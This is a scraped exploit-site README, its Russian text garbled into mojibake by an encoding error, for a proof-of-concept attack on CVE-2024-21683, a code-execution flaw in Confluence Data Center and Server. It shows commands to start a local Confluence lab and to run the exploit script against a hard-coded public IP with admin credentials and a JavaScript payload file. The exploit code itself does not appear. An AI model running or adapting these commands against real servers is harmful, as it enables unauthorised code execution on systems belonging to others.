Share
## https://sploitus.com/exploit?id=2B30C104-0A3F-5F97-9345-0BD4F5428371
# CVE-2024-21683
>21 мая 2024 Π³ΠΎΠ΄Π° Π±Ρ‹Π»Π° зарСгистрирована ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ Π² Confluence Data Center and Server, ΠΏΠΎΠ»ΡƒΡ‡ΠΈΠ²ΡˆΠ°Ρ Π½ΠΎΠΌΠ΅Ρ€ CVE-2024-21683, Π° Ρ‚Π°ΠΊΠΆΠ΅ высокий Π±Π°Π»Π» 8.3 ΠΏΠΎ ΠΌΠ΅Ρ‚Ρ€ΠΈΠΊΠ΅ CVSS.

Данная ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ позволяСт Π°Π²Ρ‚ΠΎΡ€ΠΈΠ·ΠΎΠ²Π°Π½Π½ΠΎΠΌΡƒ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŽ с Π½Π°Π»ΠΈΡ‡ΠΈΠ΅ΠΌ глобального ΠΏΡ€Π°Π²Π° доступа System Administrator ΠΎΡΡƒΡ‰Π΅ΡΡ‚Π²ΠΈΡ‚ΡŒ Π²Ρ‹ΠΏΠΎΠ»Π½Π΅Π½ΠΈΠ΅ ΠΏΡ€ΠΎΠΈΠ·Π²ΠΎΠ»ΡŒΠ½ΠΎΠ³ΠΎ ΠΊΠΎΠ΄Π°.

## Запуск ΠΏΡ€ΠΎΠ΅ΠΊΡ‚Π°

``` 
# ΠŸΠ΅Ρ€Π΅Ρ…ΠΎΠ΄ Π² Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΡŽ для запуска сСрвиса
cd confluence

# ΠšΠΎΠΏΠΈΡ€ΠΎΠ²Π°Π½ΠΈΠ΅ ΠΏΠ΅Ρ€Π΅ΠΌΠ΅Π½Π½Ρ‹Ρ… окруТСния
cp .env.example .env 

# Запуск ΠΏΡ€ΠΎΠ΅ΠΊΡ‚Π°
make run

# ΠŸΠ΅Ρ€Π΅Ρ…ΠΎΠ΄ Π² ΠΊΠΎΡ€Π΅Π½ΡŒ Ρ€Π°Π±ΠΎΡ‡Π΅ΠΉ Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΠΈ
cd ..
```

## Запуск эксплойта
``` 
# Π—Π°Π³Ρ€ΡƒΠ·ΠΊΠ° зависимостСй
poetry install

# Запуск экслойта
poetry run python3 CVE-2024-21683.py -t http://84.201.163.5:8090 -u admin -p HardP@ssw0rd\! -f ./exp.js
```